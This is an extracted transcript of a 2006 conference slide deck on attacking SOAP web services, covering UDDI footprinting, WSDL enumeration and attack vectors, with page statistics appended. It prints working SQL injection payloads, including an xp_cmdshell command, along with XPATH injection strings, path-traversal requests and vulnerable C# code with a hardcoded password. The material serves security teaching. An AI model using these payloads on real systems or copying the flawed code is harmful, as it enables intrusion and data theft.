Advanced Web Services Hacking (AusCERT 06)

Advanced Web Services Hacking Attacks & Defense Shreeraj Shah

Introduction Founder & Director G Net Square (Brief) – Past experience G Chase, IBM & Foundstone – Interest G Web security research – Published G Advisories, Tools, Papers etc. – Book G Web Hacking – http://shreeraj.blogspot.com shreeraj@net-square.com Shreeraj Shah

Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah

Industry Web 2.0 Applications are on the rise G Rich Internet Applications (RIA) – G reshaping application front Web Services on the rise – forming G backend of applications Gartner is advising companies to take up G Web services now, or risk losing out to competitors embracing the technology. Shreeraj Shah

Industry By 2008, those without Web Services or G Service-Oriented Architecture (SOA) would find their competitors had left them in the dust. [Gartner] 2006-07 would see the top 2000 global G companies pick up the technology and make it mainstream. Government and SMB would finally follow in 2008. Web services would rocket from $1.6 G billion in 2004 to $34 billion by 2007. [IDC] Shreeraj Shah

Technologies Web Services is forming back end and G accessible on SOAP AJAX – empowering browsers G XML based services G Rich Internet Applications are consuming G back end web services Search engines and mechanisms for web G services publishing and accessing Security evolving around web services G Shreeraj Shah

Technologies Internet DMZ Trusted SOAP Web Service W Client E Application Scripted B Web Servers Web S Server And Engine E Static pages Dynamic pages Web Integrated R HTML,HTM etc.. ASP DHTML, V Client Framework PHP,CGI Etc.. I ASP.NET with C X .Net E J2EE App S Server Web Services Etc.. DB Shreeraj Shah Internal/Corporate

Technologies Simple GET/POST Simple AJAX HTTP resource Web Calls Web Services Server resource Web Services Client Shreeraj Shah

Web services stack Presentation Stack XML Security Stack WS-Security Discovery Stack UDDI, DISCO Access Stack WSDL,SOAP Transport Stack HTTP, HTTPS Shreeraj Shah

Security! Web service - evolving as new attack G point in application framework. Toolkits and Exploits are coming up G Too many protocols and confusion G Race for deployment – poor G implementation Cases and attacks are growing with G growth in business usage Shreeraj Shah

Agenda Web Services Attack Vectors Strategies Tools & & Exploits Methods Defense Controls Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah

Assessment strategies Web Services Risk Model Blackbox Whitebox Assessment Assessment Web Services Defense Controls Shreeraj Shah

Risk - In transit In transit Sniffing or Spoofing G WS-Routing security concern G Replay attacks G Shreeraj Shah

Risk - Web services Engine Buffer overflow G XML parsing attacks G Spoiling Schema G Complex or Recursive structure as payload G Denial of services G Large payload G Shreeraj Shah

Web services Deployment - Risk Fault code leaks G Permissions & Access issues G Poor policies G Customized error leakage G Authentication and Certification G Shreeraj Shah

Web services User code - Risk Parameter tampering G WSDL probing G SQL/LDAP/XPATH/OS command injection G Virus/Spyware/Malware injection G Bruteforce G Data type mismatch G Content spoofing G Session tampering G Format string G Information leakage G Authorization G Shreeraj Shah

wschess (Tool) wsPawn wsFootprint Footprinting wsSearch wsDiscovery Discovery Public domain search wsEnum wsKnight Enumeration wsAudit wsProxy Manual Audit Auto Audit wsMod wsRook Defense Download : http://net-square.com/wschess/ Shreeraj Shah

Agenda Web Services Attack Vectors Strategies & Tools & Exploits Methods •Footprinting •Discovery Defense Controls •Public Domain Corporate Security Industry Web Services TCP – 80/443 Technologies Shreeraj Shah

Web Services Footprinting Shreeraj Shah

Footprinting Objectives G Place for web services… – We may know the company name in this – case? Do we have any whois for web services? – If we answer above questions then we can – have enough information on what to assess? Shreeraj Shah

UDDI Universal Description, Discovery, and G Integration (UDDI) It acts as White/Yellow/Green pages G Xmethods etc… G Information can be published and retrieved G from Gets replicated across networks over G internet Shreeraj Shah

UDDI It includes G businessEntity – businessService – bindingTemplate – tModel – Shreeraj Shah

Footprinting Business Name POST /inquire HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "" Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.microsoft.com Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-Length: 229 <?xml version="1.0" encoding="UTF-8" ?> <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/"> <Body> <find_business generic="2.0" maxRows="100" xmlns="urn:uddi- org:api_v2"><name>amazon</name></find_business> </Body> </Envelope>HTTP/1.1 100 Continue Shreeraj Shah

Footprinting Business Name HTTP/1.1 200 OK Date: Tue, 28 Sep 2004 09:53:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private, max-age=0 Content-Type: text/xml; charset=utf-8 Content-Length: 1339 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema- instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><businessList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi- org:api_v2"><businessInfos><businessInfo businessKey="bfb9dc23-adec-4f73-bd5f- 5545abaeaa1b"><name xml:lang="en-us">Amazon Web Services for Testing</name><description xml:lang="ko">Amazon Web Services 2.0 - We now offer software developers the opportunity to integrate Amazon.com</description><serviceInfos><serviceInfo serviceKey="41213238-1b33-40f4-8756- c89cc3125ecc" businessKey="bfb9dc23-adec-4f73-bd5f-5545abaeaa1b"><name xml:lang="en-us">Amazon Web Services 2.0</name></serviceInfo></serviceInfos></businessInfo><businessInfo businessKey="18b7fde2-d15c-437c-8877-ebec8216d0f5"><name xml:lang="en">Amazon.com</name><description xml:lang="en">E-commerce website and platform for finding, discovering, and buying products online.</description><serviceInfos><serviceInfo serviceKey="ba6d9d56-ea3f-4263-a95a-eeb17e5910db" businessKey="18b7fde2-d15c-437c-8877- ebec8216d0f5"><name xml:lang="en">Amazon.com Web Services</name></serviceInfo></serviceInfos></businessInfo></businessInfos></businessList></soap:Bod Shreeraj Shah y></soap:Envelope>

Footprinting Services POST /inquire HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "" Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.microsoft.com Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-Length: 213 <?xml version="1.0" encoding="UTF-8" ?> <Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/"> <Body> <find_service generic="2.0" xmlns="urn:uddi- org:api_v2"><name>amazon</name></find_service> </Body> </Envelope> HTTP/1.1 100 Continue Shreeraj Shah

Footprinting Services HTTP/1.1 200 OK Date: Tue, 28 Sep 2004 10:07:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private, max-age=0 Content-Type: text/xml; charset=utf-8 Content-Length: 1272 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema- instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><serviceList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi-org:api_v2"><serviceInfos><serviceInfo serviceKey="6ec464e0-2f8d-4daf-b4dd-5dd4ba9dc8f3" businessKey="914374fb-f10f-4634-b8ef- c9e34e8a0ee5"><name xml:lang="en-us">Amazon Research Pane</name></serviceInfo><serviceInfo serviceKey="41213238-1b33-40f4-8756-c89cc3125ecc" businessKey="bfb9dc23-adec-4f73-bd5f- 5545abaeaa1b"><name xml:lang="en-us">Amazon Web Services 2.0</name></serviceInfo><serviceInfo serviceKey="ba6d9d56-ea3f-4263-a95a-eeb17e5910db" businessKey="18b7fde2-d15c-437c-8877- ebec8216d0f5"><name xml:lang="en">Amazon.com Web Services</name></serviceInfo><serviceInfo serviceKey="bc82a008-5e4e-4c0c-8dba-c5e4e268fe12" businessKey="18785586-295e-448a-b759- ebb44a049f21"><name xml:lang="en">AmazonBookPrice</name></serviceInfo><serviceInfo serviceKey="8faa80ea-42dd-4c0d-8070-999ce0455930" businessKey="ee41518b-bf99-4a66-9e9e- c33c4c43db5a"><name xml:lang="en">AmazonBookPrice</name></serviceInfo></serviceInfos></serviceList></soap:Body></soap: Envelope> Shreeraj Shah

Footprinting t-Models POST /inquire HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "" Cache-Control: no-cache Pragma: no-cache User-Agent: Java/1.4.2_04 Host: uddi.microsoft.com Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Connection: keep-alive Content-Length: 211 <?xml version="1.0" encoding="UTF-8" ?><Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/"><Body><find_tModel generic="2.0" xmlns="urn:uddi- org:api_v2"><name>amazon</name></find_tModel></Body></Envelope> HTTP/1.1 100 Continue Shreeraj Shah

Footprinting t-Models HTTP/1.1 200 OK Date: Tue, 28 Sep 2004 10:12:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private, max-age=0 Content-Type: text/xml; charset=utf-8 Content-Length: 516 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><tModelList generic="2.0" operator="Microsoft Corporation" truncated="false" xmlns="urn:uddi- org:api_v2"><tModelInfos><tModelInfo tModelKey="uuid:c5da9443-d058-4ede-9db1- 4f1d5deb805c"><name>Amazon Web Services 2.0 WSDL File</name></tModelInfo></tModelInfos></tModelList></soap:Body></soap:Envelope> DEMO Shreeraj Shah

Web Services Discovery Shreeraj Shah

Web Service Discovery After footprinting web services next step is G to perform discovery. On the basis of services found one can do G so. Finding access point for web services will G point to its discovery. Discovery is the key to the kingdom. G Once again over UDDI. G Shreeraj Shah

Web Service Discovery From various keys – Service and Business G one can dig access point from UBN. This is a part of protocol and identified from G XML block itself. DEMO Shreeraj Shah

Web Service Search Search in public domain G Use – Search Engines G Google & MSN – An excellent tool G Look for wsdl,asmx,jws etc. G Filetype and allinurl are best friends G Leveraging Web APIs G DEMO Shreeraj Shah

Web Services Enumeration & Profiling Shreeraj Shah

Technology Identification Running on which platform? G Configuration and Structures G File extensions G Path discovery G This is very useful information G Shreeraj Shah

Demo Application Web Services Location of WSDL Shreeraj Shah

Technology Identification Location can be obtained from UDDI as well G if already published. G WSDL location [ Access Point ] http://192.168.11.2/ws/dvds4less.asmx?wsdl .asmx – indicates .Net server from MS Shreeraj Shah

Technology Identification Similarly .jws – for Java web services G /ws/ - in the path indicates web services G MS-SOAPToolkit can be identified as well G C:>nc 192.168.11.2 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 28 Sep 2004 18:48:20 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 7565 Content-Type: text/html Set-Cookie: ASPSESSIONIDSSSRQDRC=LMMPKHNAAOFDHMIHAODOJHCO; path=/ Cache-control: private Shreeraj Shah

Technology Identification Resource header spits some information as G well C:>nc 192.168.11.2 80 HEAD /ws/dvds4less.asmx HTTP/1.0 HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Tue, 28 Sep 2004 18:50:09 GMT X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 3026 Shreeraj Shah

WSDL Scanning/Enumeration What is WSDL? G What information one can G enumerate from WSDL? WSDL exposure is threat or not? G Shreeraj Shah

WSDL WSDL is web services definition G language It is similar to old IDL for remote G calls used in CORBA or other remote invoke methods. It contains detail of methods G Types of I/O G Parameters of methods G It is XML document with standards. G Shreeraj Shah

Nodes of WSDL Data types Message Operations Types Service Access Binding Shreeraj Shah

WSDL <Service> <service name="dvds4less"> <port name="dvds4lessSoap" binding="s0:dvds4lessSoap"> <soap:address location="http://192.168.11.2/ws/dvds4less.asmx"/> </port> </service> Where the call is going to hit? It is where service is listening. Shreeraj Shah

WSDL <portType> Methods one Can call <portType name="dvds4lessSoap"> <operation name="Intro"> <input message="s0:IntroSoapIn"/> <output message="s0:IntroSoapOut"/> </operation> <operation name="getProductInfo"> <input message="s0:getProductInfoSoapIn"/> <output message="s0:getProductInfoSoapOut"/> </operation> <operation name="getRebatesInfo"> <input message="s0:getRebatesInfoSoapIn"/> <output message="s0:getRebatesInfoSoapOut"/> </operation> </portType> Shreeraj Shah

WSDL <Message> <portType name="dvds4lessSoap"> <operation name="getProductInfo"> <input message="s0:getProductInfoSoapIn"/> <output message="s0:getProductInfoSoapOut"/> </operation> </portType> <message name="getProductInfoSoapIn"> <part name="parameters" element="s0:getProductInfo"/> </message> <message name="getProductInfoSoapOut"> <part name="parameters" element="s0:getProductInfoResponse"/> </message> Shreeraj Shah

WSDL <Types> <message name="getProductInfoSoapIn"> <part name="parameters" element="s0:getProductInfo"/> </message> <message name="getProductInfoSoapOut"> <part name="parameters" element="s0:getProductInfoResponse"/> </message> <s:element name="getProductInfo"> <s:complexType> <s:sequence> <s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/> </s:sequence> </s:complexType> </s:element> <s:element name="getProductInfoResponse"> <s:complexType> <s:sequence> <s:element minOccurs="0" maxOccurs="1" name="getProductInfoResult" type="s:string"/> Shreeraj Shah

WSDL Profile after Scan Methods INPUT OUTPUT Intro -No- String getProductInfo String String getRebatesInfo String String DEMO Shreeraj Shah

How it looks? Intro WSDL <PortType> Web Services Remote getProductInfo <Service> Code Invokes <Message> <Types> OR getRebatesInfo Class Shreeraj Shah

Web Services Attack Vectors Shreeraj Shah

AV 1 - XML poisoning XML node manipulation G Attack on parsing logic G SAX – DOM – Can be lethal – DoS or breaking G execution logic Shreeraj Shah

XML poisoning <CustomerRecord> <CustomerNumber>289001</CustomerNumber> <FirstName>John</FirstName> <LastName>Smith</LastName> <Address>Apt 31, 1st Street</Address> <Email>john@smith.com</Email> <PhoneNumber>3809922347</PhoneNumber> </ CustomerRecord> Shreeraj Shah

XML poisoning <CustomerRecord> <CustomerNumber>289001</CustomerNumber> <FirstName>John</FirstName><CustomerNumb er>289001</CustomerNumber> <FirstName>John</FirstName> <LastName>Smith</LastName> <Address>Apt 31, 1st Street</Address> <Email>john@smith.com</Email> <PhoneNumber>3809922347</PhoneNumber> </ CustomerRecord> Shreeraj Shah

XML poisoning <CustomerRecord> <CustomerNumber>289001</CustomerNumber> <FirstName>John</FirstName> <FirstName>John</FirstName> ... 100 time… <FirstName>John</FirstName> <LastName>Smith</LastName> <Address>Apt 31, 1st Street<Address> <Email>john@smith.com<Email> <PhoneNumber>3809922347<PhoneNumber> </ CustomerRecord> Shreeraj Shah

AV 2 - Parameter tampering & Fault code leakage Fault code of web services spit lot of G information about internal workings. This attack can fetch internal paths, G database interfaces etc. Fault code is part of SOAP envelope and this G helps an attacker to make logical deduction about assets. DEMO Shreeraj Shah

SOAP request SOAP Forcing Fault Code Envelope Source of Enumeration <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getRebatesInfo xmlns="http://tempuri.org/"> <fileinfo>abx.xyz</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> Input to the method Method Demo Call Shreeraj Shah

SOAP response <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --> Could not find file "c:inetpubwwwroot ebatesabx.xyz".</faultstring> <detail /> </soap:Fault> </soap:Body> </soap:Envelope> Fault Code Path Enumeration Shreeraj Shah

AV 3 - SQL injection SQL injection can be done using SOAP G traffic. It is innovative way of identifying database G interface points. One can leverage xp_cmdshell via SOAP. G Back end database can be compromised G using this attack. DEMO Shreeraj Shah

SOAP request SOAP Envelope <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1</id> </getProductInfo> </soap:Body> </soap:Envelope> Input to the method Method Call Shreeraj Shah

SOAP request Product Information <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> </soap:Envelope> Shreeraj Shah

SOAP response <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --> Cannot use empty object or column names. Use a single space if necessary.</faultstring> <detail /> </soap:Fault> </soap:Body> Fault Code Demo Indicates SQL Server Place for SQL Injection Shreeraj Shah

SOAP response Popular SQL Injection <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1 or 1=1</id> </getProductInfo> </soap:Body> </soap:Envelope> Fault Code Shreeraj Shah

SOAP request Works!! <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/ /(2)Bend it like Beckham($12.99)/ /(3)Doctor Zhivago($10.99)/ /(4)A Bug's Life($13.99)/ /(5)Lagaan($12.99)/ /(6)Monsoon Wedding($10.99)/ Entire Table /(7)Lawrence of Arabia($14.99)/ Is out </getProductInfoResult> </getProductInfoResponse> </soap:Body> Shreeraj Shah

SOAP response Exploiting this Vulnerability <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1;EXEC master..xp_cmdshell 'dir c: > c:inetpubwwwrootwsdir.txt'</id> </getProductInfo> </soap:Body> </soap:Envelope> Exploit code Shreeraj Shah

SOAP request Works!! <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> </soap:Envelope> Looks Normal response Shreeraj Shah

SOAP request But … Code got executed Looks Normal Got Admin via response cmdshell Shreeraj Shah

AV 4 – XPATH injection XPATH is new way of querying XML G documents. This attack works nicely on web services G since they use XML extensively. Developer’s loophole can be leveraged with G an exploit. XPATH query crafting is next generation G attack methods. Shreeraj Shah

XPATH Injection - Basics XPATH is a language defined to find G information from XML document. As XPATH name suggests it indeed uses G path to traverse through nodes of XML document and look for specific information from the document. XPATH provides expressions like slash (/), G double slash (//), dot(.), double dot (..), @, =, <, > etc. It helps in traversing through XML document. Shreeraj Shah

XPATH – Vulnerable Code string fulltext = ""; string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass"; SqlXmlCommand co = new SqlXmlCommand(coString); co.RootTag="Credential"; co.CommandType = SqlXmlCommandType.Sql; co.CommandText = "SELECT * FROM users for xml Auto"; XmlReader xr = co.ExecuteXmlReader(); xr.MoveToContent(); fulltext = xr.ReadOuterXml(); XmlDocument doc = new XmlDocument(); doc.LoadXml(fulltext); string credential = "//users[@username='"+user+"' and @password='"+pass+"']"; XmlNodeList xmln = doc.SelectNodes(credential); string temp; if(xmln.Count > 0) { //True } else //false Shreeraj Shah

Attacking XPATH point //users[@username='"+user+"' and @password='"+pass+"']"; G XPATH parsing can be leveraged by passing G following string ' or 1=1 or ''=‘ This will always true on the first node and G user can get access as who ever is first user. //users[@username='' or 1=1 or ''='' and @password='any'] G Bingo! DEMO Shreeraj Shah

AV 6 – LDAP injection LDAP authentication in place G Possible to manipulate LDAP queries G May leads to enumeration OR G manipulation Interesting attack vector G Fault code leaks LDAP interface G DEMO Shreeraj Shah

AV 7 – File System access Identifying file system points G Directory traversing & Access G Leads to file access and source code G exposure Lethal if found! G DEMO Shreeraj Shah

SOAP request SOAP Forcing Fault Code Envelope Source of Enumeration <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getRebatesInfo xmlns="http://tempuri.org/"> <fileinfo>abx.xyz</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> Input to the method Method Demo Call Shreeraj Shah

SOAP response <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --> Could not find file "c:inetpubwwwroot ebatesabx.xyz".</faultstring> <detail /> </soap:Fault> </soap:Body> </soap:Envelope> Fault Code Path Enumeration Shreeraj Shah

SOAP request SOAP Forcing file Envelope <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getRebatesInfo xmlns="http://tempuri.org/"> <fileinfo>../rebates.asp</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> Input to the method Method Call Shreeraj Shah

SOAP request File Access to system Parameter Temparing <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getRebatesInfoResponse xmlns="http://tempuri.org/"> <getRebatesInfoResult><% ' file: rebates.asp ' date: 20- AUG-03 ' desc: rebates listing ' author: nd ' client: dvds4less 'check if we have been called with a filename or without loc = request.querystring("loc") lenloc = len(loc) if lenloc > 0 then ' we have been called with a filename ' so print the rebate coupon%><img ……………………. </getRebatesInfoResult> </getRebatesInfoResponse> </soap:Body> </soap:Envelope> Shreeraj Shah

AV 7 – SOAP brute forcing SOAP envelope takes user & pass accounts. G It is possible to bruteforce SOAP envelope G and look for specific responses. This is a possible attack which can get into G the system. Analyzing SOAP response is key for this set G of attack. DEMO Shreeraj Shah

AV 8 – Parameter overflow Adding large buffers to XML nodes G Depending on code controls – It may fail in G handling Breaking the application G May compromise as well G Traditional buffer overflow type attacks G DEMO Shreeraj Shah

AV 9 – Operating System access Point to OS G Remote command execution is possible G Either by “|” or “;” G Attack is very much possible G Leads to admin/root on the box… G DEMO Shreeraj Shah

AV 10 – Session hijacking Web services can maintain sessions G [WebMethod(EnableSession=true)] – Possible to reverse engineer session G Cookie tempering is reality… G Can be compared to traditional web G application session. DEMO Shreeraj Shah

Other attacks External referencing – XML schema G XSS attack G In transit attacks – replay and G spoofing Shreeraj Shah

http://mauriziostorani.wordpress.com	1475
http://www.arcanesecurity.net	1279
http://www.slideshare.net	82
http://daniel-wedepohl.de	35
http://www.secguru.com	32
http://www.blueinfy.com	22
http://translate.googleusercontent.com	10
http://arcanesecurity.net	9
http://www.techgig.com	5
http://blueinfy.com	3
http://localhost:8080	1
http://www.admiration.se	1
http://health.medicbd.com	1
https://s3.amazonaws.com	1
http://webcache.googleusercontent.com	1

Advanced Web Services Hacking (AusCERT 06)

by Shreeraj Shah on Feb 04, 2007

Accessibility

Categories

Upload Details

Usage Rights

15 Embeds 2,957

Statistics

Advanced Web Services Hacking (AusCERT 06) Presentation Transcript